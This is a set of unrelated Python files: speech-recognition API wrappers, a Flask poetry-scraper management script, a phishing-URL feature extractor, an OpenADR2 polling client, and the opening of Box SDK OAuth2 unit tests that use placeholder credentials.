# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
def recognize_bing(self, audio_data, key, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#SupLocales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
assert isinstance(language, str), "``language`` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://api.cognitive.microsoft.com/sts/v1.0/issueToken"
credential_request = Request(credential_url, data=b"", headers={
"Content-type": "application/x-www-form-urlencoded",
"Content-Length": "0",
"Ocp-Apim-Subscription-Key": key,
})
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
access_token = credential_response.read().decode("utf-8")
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + 600 # according to https://www.microsoft.com/cognitive-services/en-us/Speech-api/documentation/API-Reference-REST/BingVoiceRecognition, the token expires in exactly 10 minutes
wav_data = audio_data.get_wav_data(
convert_rate=16000, # audio samples must be 8kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data=wav_data, headers={
"Authorization": "Bearer {}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_houndify(self, audio_data, client_id, client_key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Houndify API.
The Houndify client ID and client key are specified by ``client_id`` and ``client_key``, respectively. Unfortunately, these are not available without `signing up for an account <https://www.houndify.com/signup>`__. Once logged into the `dashboard <https://www.houndify.com/dashboard>`__, you will want to select "Register a new client", and fill in the form as necessary. When at the "Enable Domains" page, enable the "Speech To Text Only" domain, and then select "Save & Continue".
To get the client ID and client key for a Houndify client, go to the `dashboard <https://www.houndify.com/dashboard>`__ and select the client's "View Details" link. On the resulting page, the client ID and client key will be visible. Client IDs and client keys are both Base64-encoded strings.
Currently, only English is supported as a recognition language.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(client_id, str), "``client_id`` must be a string"
assert isinstance(client_key, str), "``client_key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate in [8000, 16000] else 16000, # audio samples must be 8 kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.houndify.com/v1/audio"
user_id, request_id = str(uuid.uuid4()), str(uuid.uuid4())
request_time = str(int(time.time()))
request_signature = base64.urlsafe_b64encode(
hmac.new(
base64.urlsafe_b64decode(client_key),
user_id.encode("utf-8") + b";" + request_id.encode("utf-8") + request_time.encode("utf-8"),
hashlib.sha256
).digest() # get the HMAC digest as bytes
).decode("utf-8")
request = Request(url, data=wav_data, headers={
"Content-Type": "application/json",
"Hound-Request-Info": json.dumps({"ClientID": client_id, "UserID": user_id}),
"Hound-Request-Authentication": "{};{}".format(user_id, request_id),
"Hound-Client-Authentication": "{};{};{}".format(client_id, request_time, request_signature)
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "Disambiguation" not in result or result["Disambiguation"] is None:
raise UnknownValueError()
return result['Disambiguation']['ChoiceData'][0]['Transcription']
def recognize_ibm(self, audio_data, username, password, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the IBM Speech to Text API.
The IBM Speech to Text username and password are specified by ``username`` and ``password``, respectively. Unfortunately, these are not available without `signing up for an account <https://console.ng.bluemix.net/registration/>`__. Once logged into the Bluemix console, follow the instructions for `creating an IBM Watson service instance <https://www.ibm.com/watson/developercloud/doc/getting_started/gs-credentials.shtml>`__, where the Watson service is "Speech To Text". IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, while passwords are mixed-case alphanumeric strings.
The recognition language is determined by ``language``, an RFC5646 language tag with a dialect like ``"en-US"`` (US English) or ``"zh-CN"`` (Mandarin Chinese), defaulting to US English. The supported language values are listed under the ``model`` parameter of the `audio recognition API documentation <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__, in the form ``LANGUAGE_BroadbandModel``, where ``LANGUAGE`` is the language value.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(username, str), "``username`` must be a string"
assert isinstance(password, str), "``password`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 16000 else 16000, # audio samples should be at least 16 kHz
convert_width=None if audio_data.sample_width >= 2 else 2 # audio samples should be at least 16-bit
)
url = "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize?{}".format(urlencode({
"profanity_filter": "false",
"continuous": "true",
"model": "{}_BroadbandModel".format(language),
}))
request = Request(url, data=flac_data, headers={
"Content-Type": "audio/x-flac",
"X-Watson-Learning-Opt-Out": "true", # prevent requests from being logged, for improved privacy
})
authorization_value = base64.standard_b64encode("{}:{}".format(username, password).encode("utf-8")).decode("utf-8")
request.add_header("Authorization", "Basic {}".format(authorization_value))
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "results" not in result or len(result["results"]) < 1 or "alternatives" not in result["results"][0]:
raise UnknownValueError()
transcription = []
for utterance in result["results"]:
if "alternatives" not in utterance: raise UnknownValueError()
for hypothesis in utterance["alternatives"]:
if "transcript" in hypothesis:
transcription.append(hypothesis["transcript"])
return "\n".join(transcription)
def get_flac_converter():
"""Returns the absolute path of a FLAC converter executable, or raises an OSError if none can be found."""
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
base_path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
system, machine = platform.system(), platform.machine()
if system == "Windows" and machine in {"i686", "i786", "x86", "x86_64", "AMD64"}:
flac_converter = os.path.join(base_path, "flac-win32.exe")
elif system == "Darwin" and machine in {"i686", "i786", "x86", "x86_64", "AMD64"}:
flac_converter = os.path.join(base_path, "flac-mac")
elif system == "Linux" and machine in {"i686", "i786", "x86"}:
flac_converter = os.path.join(base_path, "flac-linux-x86")
elif system == "Linux" and machine in {"x86_64", "AMD64"}:
flac_converter = os.path.join(base_path, "flac-linux-x86_64")
else: # no FLAC converter available
raise OSError("FLAC conversion utility not available - consider installing the FLAC command line application by running `apt-get install flac` or your operating system's equivalent")
# mark FLAC converter as executable if possible
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
return flac_converter
def shutil_which(pgm):
"""Python 2 compatibility: backport of ``shutil.which()`` from Python 3"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
# ===============================
# backwards compatibility shims
# ===============================
WavFile = AudioFile # WavFile was renamed to AudioFile in 3.4.1
def recognize_api(self, audio_data, client_access_token, language="en", session_id=None, show_all=False):
wav_data = audio_data.get_wav_data(convert_rate=16000, convert_width=2)
url = "https://api.api.ai/v1/query"
while True:
boundary = uuid.uuid4().hex
if boundary.encode("utf-8") not in wav_data: break
if session_id is None: session_id = uuid.uuid4().hex
data = b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"request\"\r\n" + b"Content-Type: application/json\r\n" + b"\r\n" + b"{\"v\": \"20150910\", \"sessionId\": \"" + session_id.encode("utf-8") + b"\", \"lang\": \"" + language.encode("utf-8") + b"\"}\r\n" + b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"voiceData\"; filename=\"audio.wav\"\r\n" + b"Content-Type: audio/wav\r\n" + b"\r\n" + wav_data + b"\r\n" + b"--" + boundary.encode("utf-8") + b"--\r\n"
request = Request(url, data=data, headers={"Authorization": "Bearer {}".format(client_access_token), "Content-Length": str(len(data)), "Expect": "100-continue", "Content-Type": "multipart/form-data; boundary={}".format(boundary)})
try: response = urlopen(request, timeout=10)
except HTTPError as e: raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e: raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
if show_all: return result
if "status" not in result or "errorType" not in result["status"] or result["status"]["errorType"] != "success":
raise UnknownValueError()
return result["result"]["resolvedQuery"]
Recognizer.recognize_api = classmethod(recognize_api) # API.AI Speech Recognition is deprecated/not recommended as of 3.5.0, and currently is only optionally available for paid plans
|
manages.py
|
# -*- coding: UTF-8 -*-
__author__ = 'Joynice'
import queue
import re
import threading
import requests
from faker import Faker
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from lxml import etree
from app import create_app
from exts import db
from models import Poem, Poet
user_agent = Faker('zh-CN').user_agent()
app = create_app()
manager = Manager(app)
Migrate(app, db)
manager.add_command('db', MigrateCommand)
def get_header():
return {
'User-Agent': user_agent,
'Connection': 'close'
}
# 多线程爬取,由于可能导致数据爬取不全,数据诗词总数约为20w+数据
@manager.command
def spider():
class Shici(object):
def __init__(self, thread=5):
self.poet_queue = queue.Queue() # 诗人
self.thread = thread
self.base_url = 'http://www.shicimingju.com'
def get_poet_url(self):
for i in range(1, 13054):
url = 'http://www.shicimingju.com/chaxun/zuozhe/{}.html'.format(i)
self.poet_queue.put(url)
def Spider(self):
while not self.poet_queue.empty():
url = self.poet_queue.get()
req = requests.get(url, headers=get_header())
if req.status_code == 200:
req.encoding = 'utf-8'
html = etree.HTML(req.text)
name = html.xpath('/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/h4/a/text()')[0]
dynasty = html.xpath('/html/body/div[4]/div[2]/div[1]/div[3]/div[1]/div[2]/a/text()')
if len(dynasty) == 0:
dynasty = '未知'
else:
dynasty = dynasty[0]
introduction = html.xpath('/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/div[1]')[0].xpath(
'string(.)').strip()
with app.app_context():
poet = Poet(name=name, dynasty=dynasty, introduction=introduction)
db.session.add(poet)
db.session.commit()
id = poet.id
poem_num = html.xpath('/html/body/div[4]/div[2]/div[1]/div[3]/div[2]/div[2]/a/text()')[0][:-1]
poet_url_list = []
for i in range(1, int(int(poem_num) / 40) + 2):
poet_id = re.sub("\D", "", url)
poet_page_url = 'http://www.shicimingju.com/chaxun/zuozhe/{}_{}.html'.format(poet_id, i)
req1 = requests.get(url=poet_page_url, headers=get_header())
if req1.status_code == 200:
req1.encoding = 'utf-8'
list_html = etree.HTML(req1.text)
poet_url = list_html.xpath('//*/h3/a/@href')
poet_url_list += poet_url
poet_url_list = map(lambda x: self.base_url + x, poet_url_list)
for url in poet_url_list:
print(url)
req2 = requests.get(url, headers=get_header())
if req2.status_code == 200:
req2.encoding = 'utf-8'
poet_html = etree.HTML(req2.text)
title = poet_html.xpath('//*[@class="card"]/h1/text()')[0]
content = '\n'.join(poet_html.xpath('//*[@class="item_content"]/text()')).strip()
if not content:
content = '\n'.join(poet_html.xpath('//*[@class="para"]/text()')).strip()
if len(poet_html.xpath('//*[@class="shangxi_content"]')) == 0:
analysis = ''
else:
analysis = poet_html.xpath('//*[@class="shangxi_content"]')[0].xpath(
'string(.)').strip()
with app.app_context():
poem = Poem(title=title, content=content, analysis=analysis, author=id)
db.session.add(poem)
db.session.commit()
def run(self):
self.get_poet_url()
thread_list = []
for i in range(self.thread):
t = threading.Thread(target=self.Spider)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
t.join()
self.Spider()
a = Shici()
a.run()
if __name__ == '__main__':
manager.run()
|
Helper.py
|
import threading
from utils.Checker import Checker
class Helper():
def url_is_internal(url,compare):
# url is the param needed to be compared to compare
if ".".join(extract(url)) == ".".join(extract(compare)) or (url[0:4] != "http" and url[0] != "#"):
return True
else:
return False
def embed_url(url):
features_size = 30
threads = [None]*features_size
arr_threads_result = []
arr = []
try:
threads[0] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.having_IP_Address(arg1),0)), args=(url,))
threads[1] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.URL_Length(arg1),1)), args=(url,))
threads[2] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Shortining_Service(arg1),2)), args=(url,))
threads[3] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.having_At_Symbol(arg1),3)), args=(url,))
threads[4] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.double_slash_redirecting(arg1),4)), args=(url,))
threads[5] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Prefix_Suffix(arg1),5)), args=(url,))
threads[6] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.having_Sub_Domain(arg1),6)), args=(url,))
threads[7] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.SSLfinal_State(arg1),7)), args=(url,))
threads[8] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Domain_registeration_length(arg1),8)), args=(url,))
threads[9] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Favicon(arg1),9)), args=(url,))
threads[10]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.port(arg1),10)), args=(url,))
threads[11]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.HTTPS_token(arg1),11)), args=(url,))
threads[12]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Request_URL(arg1),12)), args=(url,))
threads[13]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.URL_of_Anchor(arg1),13)), args=(url,))
threads[14]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Links_in_tags(arg1),14)), args=(url,))
threads[15]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.SFH(arg1),15)), args=(url,))
threads[16]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Submitting_to_email(arg1),16)), args=(url,))
threads[17]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Abnormal_URL(arg1),17)), args=(url,))
threads[18]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Redirect(arg1),18)), args=(url,))
threads[19]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.on_mouseover (arg1),19)), args=(url,))
threads[20]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.RightClick (arg1),20)), args=(url,))
threads[21]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.popUpWidnow (arg1),21)), args=(url,))
threads[22]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Iframe(arg1),22)), args=(url,))
threads[23]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.age_of_domain(arg1),23)), args=(url,))
threads[24]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.DNSRecord(arg1),24)), args=(url,))
threads[25]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.web_traffic(arg1),25)), args=(url,))
threads[26]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Page_Rank(arg1),26)), args=(url,))
threads[27]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Google_Index(arg1),27)), args=(url,))
threads[28]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Links_pointing_to_page(arg1),28)), args=(url,))
threads[29]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Statistical_report(arg1),29)), args=(url,))
for i in range(features_size):
threads[i].start()
for i in range(features_size):
threads[i].join()
arr_threads_result.sort(key=lambda tup: tup[1])
for elem in arr_threads_result:
arr.append(elem[0])
return arr
except Exception as e:
return e
|
poll.py
|
# pylint: disable=W1202, I1101
import threading
import urllib.error
import urllib.parse
import urllib.request
from random import uniform
import requests
from lxml import etree
from oadr2 import base, logger
# HTTP parameters:
REQUEST_TIMEOUT = 5 # HTTP request timeout
DEFAULT_VTN_POLL_INTERVAL = 300 # poll the VTN every X seconds
MINIMUM_POLL_INTERVAL = 10
POLLING_JITTER = 0.1 # polling interval +/-
OADR2_URI_PATH = 'OpenADR2/Simple/' # URI of where the VEN needs to request from
class OpenADR2(base.BaseHandler):
'''
poll.OpenADR2 is the class for sending requests and responses for OpenADR
2.0 events over HTTP.
Member Variables:
--------
(Everything from base.BaseHandler)
vtn_base_uri
vtn_poll_interval
ven_client_cert_key
ven_client_cert_pem
vtn_ca_certs
poll_thread
'''
def __init__(self, event_config, vtn_base_uri,
control_opts={},
username=None,
password=None,
ven_client_cert_key=None,
ven_client_cert_pem=None,
vtn_ca_certs=False,
vtn_poll_interval=DEFAULT_VTN_POLL_INTERVAL,
start_thread=True,
client_id=None,
):
'''
Sets up the class and intializes the HTTP client.
event_config -- A dictionary containing key-word arugments for the
EventHandller
ven_client_cert_key -- Certification Key for the HTTP Client
ven_client_cert_pem -- PEM file/string for the HTTP Client
vtn_base_uri -- Base URI of the VTN's location
vtn_poll_interval -- How often we should poll the VTN
vtn_ca_certs -- CA Certs for the VTN
start_thread -- start the thread for the poll loop or not? left as a legacy option
'''
# Call the parent's methods
super(OpenADR2, self).__init__(event_config, control_opts, client_id=client_id)
# Get the VTN's base uri set
self.vtn_base_uri = vtn_base_uri
if self.vtn_base_uri: # append path
join_char = '/' if self.vtn_base_uri[-1] != '/' else ''
self.vtn_base_uri = join_char.join((self.vtn_base_uri, OADR2_URI_PATH))
try:
self.vtn_poll_interval = int(vtn_poll_interval)
assert self.vtn_poll_interval >= MINIMUM_POLL_INTERVAL
except ValueError:
logger.warning('Invalid poll interval: %s', self.vtn_poll_interval)
self.vtn_poll_interval = DEFAULT_VTN_POLL_INTERVAL
# Security & Authentication related
self.ven_certs = (ven_client_cert_pem, ven_client_cert_key)\
if ven_client_cert_pem and ven_client_cert_key else None
self.vtn_ca_certs = vtn_ca_certs
self.__username = username
self.__password = password
self.poll_thread = None
if start_thread: # this is left for backward compatibility
self.start()
logger.info("+++++++++++++++ OADR2 module started ++++++++++++++")
def start(self):
'''
Initialize the HTTP client.
start_thread -- To start the polling thread or not.
'''
if self.poll_thread and self.poll_thread.is_alive():
logger.warning("Thread is already running")
return
self.poll_thread = threading.Thread(
name='oadr2.poll',
target=self.poll_vtn_loop)
self.poll_thread.daemon = True
self._exit.clear()
self.poll_thread.start()
logger.info("Polling thread started")
def stop(self):
'''
Stops polling without stopping event controller
:return:
'''
if self.poll_thread is not None:
self.poll_thread.join(2) # they are daemons.
self._exit.set()
logger.info("Polling thread stopped")
def exit(self):
'''
Shutdown the HTTP client, join the running threads and exit.
'''
if self.poll_thread is not None:
self.poll_thread.join(2) # they are daemons.
super(OpenADR2, self).exit()
def poll_vtn_loop(self):
'''
The threading loop which polls the VTN on an interval
'''
while not self._exit.is_set():
try:
self.query_vtn()
except urllib.error.HTTPError as ex: # 4xx or 5xx HTTP response:
logger.warning("HTTP error: %s\n%s", ex, ex.read())
except urllib.error.URLError as ex: # network error.
logger.debug("Network error: %s", ex)
except Exception as ex:
logger.exception("Error in OADR2 poll thread: %s", ex)
self._exit.wait(
uniform(
self.vtn_poll_interval*(1-POLLING_JITTER),
self.vtn_poll_interval*(1+POLLING_JITTER)
)
)
logger.info("+++++++++++++++ OADR2 polling thread has exited.")
def query_vtn(self):
'''
Query the VTN for an event.
'''
if not self.vtn_base_uri:
logger.warning("VTN base URI is invalid: %s", self.vtn_base_uri)
return
event_uri = self.vtn_base_uri + 'EiEvent'
payload = self.event_handler.build_request_payload()
logger.debug(
f'New polling request to {event_uri}:\n'
f'{etree.tostring(payload, pretty_print=True).decode("utf-8")}'
)
try:
resp = requests.post(
event_uri,
cert=self.ven_certs,
verify=self.vtn_ca_certs,
data=etree.tostring(payload),
auth=(self.__username, self.__password) if self.__username or self.__password else None
)
except Exception as ex:
logger.warning(f"Connection failed: {ex}")
return
reply = None
try:
payload = etree.fromstring(resp.content)
logger.debug(
f'Got Payload:\n'
f'{etree.tostring(payload, pretty_print=True).decode("utf-8")}'
)
reply = self.event_handler.handle_payload(payload)
except Exception as ex:
logger.warning(
f"Connection failed: error parsing payload\n"
f"{ex}: {resp.content}"
)
# If we have a generated reply:
if reply is not None:
logger.debug(
f'Reply to {event_uri}:\n'
f'{etree.tostring(reply, pretty_print=True).decode("utf-8")}'
)
# tell the control loop that events may have updated
# (note `self.event_controller` is defined in base.BaseHandler)
self.event_controller.events_updated()
self.send_reply(reply, event_uri) # And send the response
def send_reply(self, payload, uri):
'''
Send a reply back to the VTN.
payload -- An lxml.etree.ElementTree object containing an OpenADR 2.0
payload
uri -- The URI (of the VTN) where the response should be sent
'''
resp = requests.post(
uri,
cert=self.ven_certs,
verify=self.vtn_ca_certs,
data=etree.tostring(payload),
timeout=REQUEST_TIMEOUT,
auth=(self.__username, self.__password) if self.__username or self.__password else None
)
logger.debug("EiEvent response: %s", resp.status_code)
|
test_oauth2.py
|
# coding: utf-8
from __future__ import unicode_literals
from functools import partial
import re
from threading import Thread
import uuid
from mock import Mock, patch
import pytest
from six.moves import range # pylint:disable=redefined-builtin
# pylint:disable=import-error,no-name-in-module,wrong-import-order,relative-import
from six.moves.urllib import parse as urlparse
# pylint:enable=import-error,no-name-in-module,wrong-import-order,relative-import
from boxsdk.exception import BoxOAuthException
from boxsdk.network.default_network import DefaultNetworkResponse
from boxsdk.auth.oauth2 import OAuth2
from boxsdk.config import API
class MyError(Exception):
pass
class MyBaseException(BaseException):
pass
@pytest.fixture(params=('https://url.com/foo?bar=baz', 'https://ȕŕľ.com/ƒőő?Ƅȁŕ=Ƅȁż', None))
def redirect_url(request):
"""A value for the `redirect_uri` query string parameter for OAuth2."""
return request.param
def test_get_correct_authorization_url(redirect_url):
# pylint:disable=redefined-outer-name
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
oauth2 = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
)
auth_url, csrf_token = oauth2.get_authorization_url(redirect_url=redirect_url)
expected_auth_url_format = '{0}?state={1}&response_type=code&client_id={2}'
if redirect_url:
expected_auth_url_format += '&redirect_uri={3}'
assert auth_url == expected_auth_url_format.format(
API.OAUTH2_AUTHORIZE_URL,
csrf_token,
fake_client_id,
urlparse.quote_plus((redirect_url or '').encode('utf-8')),
)
assert re.match('^box_csrf_token_[A-Za-z0-9]{16}$', csrf_token)
def test_authenticate_send_post_request_with_correct_params(mock_box_session, successful_token_response):
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_auth_code = 'fake_auth_code'
data = {
'grant_type': 'authorization_code',
'code': fake_auth_code,
'client_id': fake_client_id,
'client_secret': fake_client_secret,
'box_device_id': '0',
'box_device_name': 'my_awesome_device',
}
mock_box_session.request.return_value = successful_token_response
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
session=mock_box_session,
box_device_name='my_awesome_device',
)
oauth.authenticate(fake_auth_code)
mock_box_session.request.assert_called_once_with(
'POST',
'{0}/token'.format(API.OAUTH2_API_URL),
data=data,
headers={'content-type': 'application/x-www-form-urlencoded'},
access_token=None,
)
assert oauth.access_token == successful_token_response.json()['access_token']
@pytest.mark.parametrize('_', range(10))
def test_refresh_send_post_request_with_correct_params_and_handles_multiple_requests(
mock_box_session,
successful_token_response,
_,
):
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_refresh_token = 'fake_refresh_token'
fake_access_token = 'fake_access_token'
data = {
'grant_type': 'refresh_token',
'refresh_token': fake_refresh_token,
'client_id': fake_client_id,
'client_secret': fake_client_secret,
'box_device_id': '0',
'box_device_name': 'my_awesome_device',
}
mock_box_session.request.return_value = successful_token_response
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
access_token=fake_access_token,
refresh_token=fake_refresh_token,
session=mock_box_session,
box_device_name='my_awesome_device',
)
# Create four threads to call refresh on oauth at the same time.
threads = []
for _ in range(4):
threads.append(Thread(target=oauth.refresh, args=(fake_access_token,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Assert that even four threads were trying to refresh the tokens at the same time, only one token request was made,
# and it was made with the correct params.
mock_box_session.request.assert_called_once_with(
'POST',
'{0}/token'.format(API.OAUTH2_API_URL),
data=data,
headers={'content-type': 'application/x-www-form-urlencoded'},
access_token=fake_access_token,
)
def test_authenticate_stores_tokens_correctly(mock_box_session, successful_token_response):
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_auth_code = 'fake_auth_code'
mock_box_session.request.return_value = successful_token_response
mock_token_callback = Mock()
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
session=mock_box_session,
store_tokens=mock_token_callback,
)
access_token, refresh_token = oauth.authenticate(fake_auth_code)
mock_token_callback.assert_called_once_with(access_token, refresh_token)
assert access_token == successful_token_response.json()['access_token']
assert refresh_token == successful_token_response.json()['refresh_token']
@pytest.mark.parametrize('_', range(10))
def test_refresh_gives_back_the_correct_response_and_handles_multiple_requests(
mock_box_session,
successful_token_response,
network_response_with_missing_tokens,
_,
):
# pylint:disable=redefined-outer-name
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_refresh_token = 'fake_refresh_token'
fake_access_token = 'fake_access_token'
# Setup the network layer so that if oauth makes more than one request, it will get a malformed response and failed
# the test.
mock_box_session.request.side_effect = [successful_token_response, network_response_with_missing_tokens]
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
access_token=fake_access_token,
refresh_token=fake_refresh_token,
session=mock_box_session,
)
def refresh_tokens_and_verify_the_response():
access_token, refresh_token = oauth.refresh(fake_access_token)
assert access_token == successful_token_response.json()['access_token']
assert refresh_token == successful_token_response.json()['refresh_token']
# Creates four threads and do token refresh at the same time. Assert they all get the same new access token and
# refresh token.
threads = []
for _ in range(4):
threads.append(Thread(target=refresh_tokens_and_verify_the_response))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
@pytest.fixture()
def token_method(request):
""" Fixture that returns a partial method based on the method provided in request.param"""
if request.param == OAuth2.refresh:
return partial(OAuth2.refresh, access_token_to_refresh='fake_access_token')
elif request.param == OAuth2.authenticate:
return partial(OAuth2.authenticate, auth_code='fake_code')
return None
@pytest.mark.parametrize(
'token_method',
[OAuth2.refresh, OAuth2.authenticate],
indirect=True,
)
def test_token_request_raises_box_oauth_exception_when_getting_bad_network_response(
token_method,
mock_box_session,
bad_network_response,
):
